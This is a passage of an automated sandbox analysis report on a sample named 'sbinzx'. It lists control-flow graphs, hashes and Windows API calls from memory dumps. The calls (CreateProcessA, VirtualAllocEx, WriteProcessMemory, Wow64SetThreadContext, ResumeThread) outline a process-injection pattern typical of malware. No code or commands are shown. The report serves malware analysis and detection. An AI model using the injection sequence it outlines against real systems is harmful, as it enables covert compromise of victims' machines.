                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 85cba26e34f418b508015954a2beee3cfb77542e3fa9878efd5bbf968d245670
                                                                                • Instruction ID: af1a3669002b37bbdf223ddd5416faa2440e280b2457724ad511bfd71142d3f6
                                                                                • Opcode Fuzzy Hash: 85cba26e34f418b508015954a2beee3cfb77542e3fa9878efd5bbf968d245670
                                                                                • Instruction Fuzzy Hash: 20A18C71D00319DFEB61EF68C841BEEBBB2BF44310F0485A9E848A7280DB759985CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 765 6dd8800-6dd8895 767 6dd88ce-6dd88ee 765->767 768 6dd8897-6dd88a1 765->768 773 6dd8927-6dd8956 767->773 774 6dd88f0-6dd88fa 767->774 768->767 769 6dd88a3-6dd88a5 768->769 771 6dd88c8-6dd88cb 769->771 772 6dd88a7-6dd88b1 769->772 771->767 775 6dd88b5-6dd88c4 772->775 776 6dd88b3 772->776 784 6dd898f-6dd8a49 CreateProcessA 773->784 785 6dd8958-6dd8962 773->785 774->773 777 6dd88fc-6dd88fe 774->777 775->775 778 6dd88c6 775->778 776->775 779 6dd8921-6dd8924 777->779 780 6dd8900-6dd890a 777->780 778->771 779->773 782 6dd890c 780->782 783 6dd890e-6dd891d 780->783 782->783 783->783 786 6dd891f 783->786 796 6dd8a4b-6dd8a51 784->796 797 6dd8a52-6dd8ad8 784->797 785->784 787 6dd8964-6dd8966 785->787 786->779 789 6dd8989-6dd898c 787->789 790 6dd8968-6dd8972 787->790 789->784 791 6dd8974 790->791 792 6dd8976-6dd8985 790->792 791->792 792->792 793 6dd8987 792->793 793->789 796->797 807 6dd8ae8-6dd8aec 797->807 808 6dd8ada-6dd8ade 797->808 809 6dd8afc-6dd8b00 807->809 810 6dd8aee-6dd8af2 807->810 808->807 811 6dd8ae0 808->811 813 6dd8b10-6dd8b14 809->813 814 6dd8b02-6dd8b06 809->814 810->809 812 6dd8af4 810->812 811->807 812->809 816 6dd8b26-6dd8b2d 813->816 817 6dd8b16-6dd8b1c 813->817 814->813 815 6dd8b08 814->815 815->813 818 6dd8b2f-6dd8b3e 816->818 819 6dd8b44 816->819 817->816 818->819 820 6dd8b45 819->820 820->820
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD8A36
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 1f46a36fbd8345be3107a15f68a5876723ff6326d23465b7a93bda8d01ba32a9
                                                                                • Instruction ID: 98cb36358d32633a4adb8be1995dc6bc2df1a49233f803ba1d333e9b2b347065
                                                                                • Opcode Fuzzy Hash: 1f46a36fbd8345be3107a15f68a5876723ff6326d23465b7a93bda8d01ba32a9
                                                                                • Instruction Fuzzy Hash: 4C917B71D00319DFEB65DF68C841BEDBBB2BF48310F0485A9E848A7280DB749985DF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 822 270ad48-270ad57 823 270ad83-270ad87 822->823 824 270ad59-270ad66 call 270a06c 822->824 825 270ad89-270ad93 823->825 826 270ad9b-270addc 823->826 831 270ad68 824->831 832 270ad7c 824->832 825->826 833 270ade9-270adf7 826->833 834 270adde-270ade6 826->834 877 270ad6e call 270afe0 831->877 878 270ad6e call 270afd0 831->878 832->823 836 270adf9-270adfe 833->836 837 270ae1b-270ae1d 833->837 834->833 835 270ad74-270ad76 835->832 838 270aeb8-270af78 835->838 840 270ae00-270ae07 call 270a078 836->840 841 270ae09 836->841 839 270ae20-270ae27 837->839 872 270af80-270afab GetModuleHandleW 838->872 873 270af7a-270af7d 838->873 843 270ae34-270ae3b 839->843 844 270ae29-270ae31 839->844 842 270ae0b-270ae19 840->842 841->842 842->839 846 270ae48-270ae51 call 270a088 843->846 847 270ae3d-270ae45 843->847 844->843 853 270ae53-270ae5b 846->853 854 270ae5e-270ae63 846->854 847->846 853->854 855 270ae81-270ae85 854->855 856 270ae65-270ae6c 854->856 859 270ae8b-270ae8e 855->859 856->855 858 270ae6e-270ae7e call 270a098 call 270a0a8 856->858 858->855 862 270ae90-270aeae 859->862 863 270aeb1-270aeb7 859->863 862->863 874 270afb4-270afc8 872->874 875 270afad-270afb3 872->875 873->872 875->874 877->835 878->835
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0270AF9E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1284989247.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2700000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: c65112805708ead642afcd02803fdcf6b0afed628811ffb62c3ad7cfd8d82071
                                                                                • Instruction ID: 58199f527c6a1b3b3f53bc60dedf863d7c790d3f38a28883a810646209eda915
                                                                                • Opcode Fuzzy Hash: c65112805708ead642afcd02803fdcf6b0afed628811ffb62c3ad7cfd8d82071
                                                                                • Instruction Fuzzy Hash: 9971F370A00B058FD724DF2AD49575ABBF1FF88304F008A2DD58ADBA90DB75E949CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 987 27044c4-27059d9 CreateActCtxA 990 27059e2-2705a3c 987->990 991 27059db-27059e1 987->991 998 2705a4b-2705a4f 990->998 999 2705a3e-2705a41 990->999 991->990 1000 2705a60 998->1000 1001 2705a51-2705a5d 998->1001 999->998 1003 2705a61 1000->1003 1001->1000 1003->1003
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 027059C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1284989247.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2700000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 35224f18377d9d3c757a14117159a8b3b3b7d7f8d4ca387bfb85fe926d9b1a57
                                                                                • Instruction ID: 946ba563f995da2566944974b536f15a968ccd5ef2d341d7665db9fb49b0f141
                                                                                • Opcode Fuzzy Hash: 35224f18377d9d3c757a14117159a8b3b3b7d7f8d4ca387bfb85fe926d9b1a57
                                                                                • Instruction Fuzzy Hash: 0A41C4B1C0071DCBEB24DFAAC88479DBBF5BF48714F608169D408AB291DB75694ACF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1004 270590c-27059d9 CreateActCtxA 1006 27059e2-2705a3c 1004->1006 1007 27059db-27059e1 1004->1007 1014 2705a4b-2705a4f 1006->1014 1015 2705a3e-2705a41 1006->1015 1007->1006 1016 2705a60 1014->1016 1017 2705a51-2705a5d 1014->1017 1015->1014 1019 2705a61 1016->1019 1017->1016 1019->1019
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 027059C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1284989247.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2700000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: dac4fdb78b318d695a2956e80e6f65e47567c451925e86babf236d6acb381ac0
                                                                                • Instruction ID: 4539d6c8f8b326043329f1c806ba5e833d0101ade8469544993e252f14b06774
                                                                                • Opcode Fuzzy Hash: dac4fdb78b318d695a2956e80e6f65e47567c451925e86babf236d6acb381ac0
                                                                                • Instruction Fuzzy Hash: 5641D4B1C01719CBEB24DFAAC88479DBBF1BF48714F60816AD408AB290DB75694ACF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1020 6dd8570-6dd85c6 1022 6dd85c8-6dd85d4 1020->1022 1023 6dd85d6-6dd8615 WriteProcessMemory 1020->1023 1022->1023 1025 6dd861e-6dd864e 1023->1025 1026 6dd8617-6dd861d 1023->1026 1026->1025
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD8608
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 753d8503755f9df385d869b4ac3bacac4013679b89763ceccb64a0bcacfdcbe3
                                                                                • Instruction ID: be467d109e1e7a3760d738a59c1323c565c4b14899015bd4d8a35790c80484f5
                                                                                • Opcode Fuzzy Hash: 753d8503755f9df385d869b4ac3bacac4013679b89763ceccb64a0bcacfdcbe3
                                                                                • Instruction Fuzzy Hash: C6215771D003499FDB10DFAAC881BDEBBF5FF48320F508429E918A7240DB789941CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1044 6dd8662-6dd86f5 ReadProcessMemory 1047 6dd86fe-6dd872e 1044->1047 1048 6dd86f7-6dd86fd 1044->1048 1048->1047
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD86E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 5ad04d2010672d78d23e148a46f5e4c963821ef03ef8501819466040690b4197
                                                                                • Instruction ID: a38b2e1cb9bf5e7101ce397e3977ccd7fee69a6adba53dcf1d69767f7cfa63ee
                                                                                • Opcode Fuzzy Hash: 5ad04d2010672d78d23e148a46f5e4c963821ef03ef8501819466040690b4197
                                                                                • Instruction Fuzzy Hash: E9212871C003499FDB10DFA9C980BEEBBF5FF48310F50842AE519A7240D7799905DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1030 270d21c-270d6c4 DuplicateHandle 1033 270d6c6-270d6cc 1030->1033 1034 270d6cd-270d6ea 1030->1034 1033->1034
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0270D5F6,?,?,?,?,?), ref: 0270D6B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1284989247.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2700000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: e044bfd2ee0c5b43d9fdd54ba1efa5a9064adcb4d11403a9ca4f304b4550cc3f
                                                                                • Instruction ID: e9c12979b9c9e72d5bef7a7c04c88ce39411c82f216fbe13be98ec5cc6750375
                                                                                • Opcode Fuzzy Hash: e044bfd2ee0c5b43d9fdd54ba1efa5a9064adcb4d11403a9ca4f304b4550cc3f
                                                                                • Instruction Fuzzy Hash: 7821E5B5D00348DFDB10DF9AD584AEEBBF4EB48310F14805AE918A7350D375A944CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1037 270d628-270d62e 1038 270d630-270d633 1037->1038 1039 270d634-270d6c4 DuplicateHandle 1037->1039 1038->1039 1040 270d6c6-270d6cc 1039->1040 1041 270d6cd-270d6ea 1039->1041 1040->1041
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0270D5F6,?,?,?,?,?), ref: 0270D6B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1284989247.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2700000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 23351073a7210de2135c9df11d6d21da7975f3e8e521f83126abc33da169428c
                                                                                • Instruction ID: 5b22b95e9b8a2a1c511861365ea8a45980a2cc37742fac573ea424697b03e746
                                                                                • Opcode Fuzzy Hash: 23351073a7210de2135c9df11d6d21da7975f3e8e521f83126abc33da169428c
                                                                                • Instruction Fuzzy Hash: 3321F4B5900349DFDB10CFAAD984ADEBBF4EB48314F10801AE918A3350C374A944CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD81FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 785bab26ba29c0cb1519ceb26d70c5b425e07758bcacd91b8196741456f9a487
                                                                                • Instruction ID: 21e43a2c314cfbf40a5fc0e4e6d8abb6e2969d99fcbd0e3689f80c061dfba347
                                                                                • Opcode Fuzzy Hash: 785bab26ba29c0cb1519ceb26d70c5b425e07758bcacd91b8196741456f9a487
                                                                                • Instruction Fuzzy Hash: EE213571D003098FDB24DFAAC585BEEBBF1AF48324F54842AD469A7340CB789945CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD86E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 6332ea6a07f0a75fcae88f2019145cc688da4bd8803443e5fcb6574c03155907
                                                                                • Instruction ID: c31ebb3676fc98cbff8ccce5ed362dd3f2b42a1cbe6fb655ae0f65e1f43450f9
                                                                                • Opcode Fuzzy Hash: 6332ea6a07f0a75fcae88f2019145cc688da4bd8803443e5fcb6574c03155907
                                                                                • Instruction Fuzzy Hash: A821E671C003499FDB10DFAAC881BDEBBF5FF48320F508429E919A7240DB799945DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD81FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: d629245274acc903495712522dbc616e649c406c58268bbd1d8fad3a201873a0
                                                                                • Instruction ID: 3baf6e35c80eaa81ba7f5923abd8ea4ac0dec5a9ab08dafd1be105dfead80949
                                                                                • Opcode Fuzzy Hash: d629245274acc903495712522dbc616e649c406c58268bbd1d8fad3a201873a0
                                                                                • Instruction Fuzzy Hash: 8C214971D003098FDB20DFAAC485BEEBBF4EF48324F548429D459A7240CB789945CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 3a0b6b51621f893fea80559d2262b05edf4abb4fbf8ea0d26c8068f524716f69
                                                                                • Instruction ID: 84813648e1ac5d91ccc2cafaf5e7120f1baeb8e69e118a194d06e16c4fb056bf
                                                                                • Opcode Fuzzy Hash: 3a0b6b51621f893fea80559d2262b05edf4abb4fbf8ea0d26c8068f524716f69
                                                                                • Instruction Fuzzy Hash: 70115971D013498FDB20EFAAC845BEEFBF5AF48320F248429D515B7240CA35A945CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD82C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: aadc59a530f3c5f967a0694aab45f5fcc2ea069a52aeb9ab8629c03b9578e357
                                                                                • Instruction ID: a6d4055dca07a4038d7893a83e1d41dbefa91aa7aefa48a4f8fc2bd614a1a011
                                                                                • Opcode Fuzzy Hash: aadc59a530f3c5f967a0694aab45f5fcc2ea069a52aeb9ab8629c03b9578e357
                                                                                • Instruction Fuzzy Hash: E6114471C003499FDB20EFAAC844BEEBFF5AF88320F148819E519A7250C7759901CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0270B019,00000800,00000000,00000000), ref: 0270B22A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1284989247.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2700000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: a1c1e9e525525ce00367dc4190ae9ea12ed2754900d9ae42024f09ce75360109
                                                                                • Instruction ID: 3fc95935e1b1fda9f7170ff81f37eefd0860ff4ff8dec6254a14655a02e87609
                                                                                • Opcode Fuzzy Hash: a1c1e9e525525ce00367dc4190ae9ea12ed2754900d9ae42024f09ce75360109
                                                                                • Instruction Fuzzy Hash: 4C11F2B69003499BDB20DF9AD484AAEFBF4EB48314F10842AE519A7240C375A945CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0270B019,00000800,00000000,00000000), ref: 0270B22A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1284989247.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2700000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 0858753bd83d008c24d3f4d0d1823c44660001f38056813b23eae5c2d54d4560
                                                                                • Instruction ID: f6b133ee879b12995a9bce35145bf7104e2e842163fe361715ed97cc53affbec
                                                                                • Opcode Fuzzy Hash: 0858753bd83d008c24d3f4d0d1823c44660001f38056813b23eae5c2d54d4560
                                                                                • Instruction Fuzzy Hash: 021144B6C003098FDB10DFAAD484BDEFBF4EB48314F10802AD528A7240C779A545CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD82C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: b11a5d80dee401d1a1a8d3fc5a39d4f9749a3f2a68af0232de27533bcf612cdd
                                                                                • Instruction ID: 6e8a873ea1236f7a9de4e0e44e3a00f3bf687d924437d6994bb8d3b583576b02
                                                                                • Opcode Fuzzy Hash: b11a5d80dee401d1a1a8d3fc5a39d4f9749a3f2a68af0232de27533bcf612cdd
                                                                                • Instruction Fuzzy Hash: 03111471C003499FDB20DFAAC845BDEBFF5AF48320F148419E515A7250CB75A941CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06DDABA9,?,?), ref: 06DDAD50
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: 6ef3cab3c80487aebda60257ec2c7573dc879762b44b6cd8d46630b2e655c5b3
                                                                                • Instruction ID: f16ee9054032c6d630e7fcc3fcefb9845e7c3610d29af6478600b0923bcccc84
                                                                                • Opcode Fuzzy Hash: 6ef3cab3c80487aebda60257ec2c7573dc879762b44b6cd8d46630b2e655c5b3
                                                                                • Instruction Fuzzy Hash: 6F1128B5C003499FDB20EF9AC545BEEBBF4EB48320F148419D968A7340D779A944CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06DDABA9,?,?), ref: 06DDAD50
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: 04c6ac66cf00d43f08e60fbff7929c51f65d1bb270d76ac759a1512c9de79ba7
                                                                                • Instruction ID: 611c67bc00991624b6f408ce43ee9f5b2cea85d3070c48e11181d8786c6f7aac
                                                                                • Opcode Fuzzy Hash: 04c6ac66cf00d43f08e60fbff7929c51f65d1bb270d76ac759a1512c9de79ba7
                                                                                • Instruction Fuzzy Hash: 161128B5C003498FDB20EF9AC585BDEBBF4EB48320F148419D968A7340D778A945CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06DDABA9,?,?), ref: 06DDAD50
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: bcc015b9728cf6e5bc27d6c960b29748a58e975d0772149e9924effe6d4a3dcb
                                                                                • Instruction ID: f219681d9c316c850c7f5dee78d8aa35c37a29fbf1fc1d4b892ad97880219276
                                                                                • Opcode Fuzzy Hash: bcc015b9728cf6e5bc27d6c960b29748a58e975d0772149e9924effe6d4a3dcb
                                                                                • Instruction Fuzzy Hash: 221125B5C003498FDB20DF99C585BDEBBF4EB48320F14841AD968A7340D738AA45CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 1ba7e3c1b863dead22ac08ec7c39b23c3c8da4bf1333529ce3450bb97a103fb0
                                                                                • Instruction ID: d108fd3a70f8405ac9170c0c936f3b6496d9e448614bc61475c9885e0e3f082a
                                                                                • Opcode Fuzzy Hash: 1ba7e3c1b863dead22ac08ec7c39b23c3c8da4bf1333529ce3450bb97a103fb0
                                                                                • Instruction Fuzzy Hash: 4C110A71D003498FDB24DFAAC84579EFBF5EF48324F148419D529A7240CB756945CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0270AF9E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1284989247.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2700000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 509a474ba0d2b86431577756e3bf7d670165b38c3e934b4d8766d804bf83e251
                                                                                • Instruction ID: 38824c9ef6e122b0e7f0c6efb48317061816dd81b8a20c465a97d818f1fec024
                                                                                • Opcode Fuzzy Hash: 509a474ba0d2b86431577756e3bf7d670165b38c3e934b4d8766d804bf83e251
                                                                                • Instruction Fuzzy Hash: AF1102B6C003498FDB10DF9AC584ADEFBF4AF88314F10842AD528A7240C379A549CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • PostMessageW.USER32(?,?,?,?), ref: 06DD9DC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1296834972.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_6dd0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: ef3aa66b38bd6f6a8b33e46b20fbfb3723b41bce44c4df1d34158c3321dbc296
                                                                                • Instruction ID: d319c318da175642af9619c7701c625a4a219519970f6dd21eb5b7ca743c993d
                                                                                • Opcode Fuzzy Hash: ef3aa66b38bd6f6a8b33e46b20fbfb3723b41bce44c4df1d34158c3321dbc296
                                                                                • Instruction Fuzzy Hash: EC11E2B58003499FDB20DF9AC985BDEFFF8EB48324F10841AE518A7640C379A944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1276951436.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_9fd000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d1558bc33885baed851141dde2673dbd431cf77c18ad9d2a1d21d1e2aeef8939
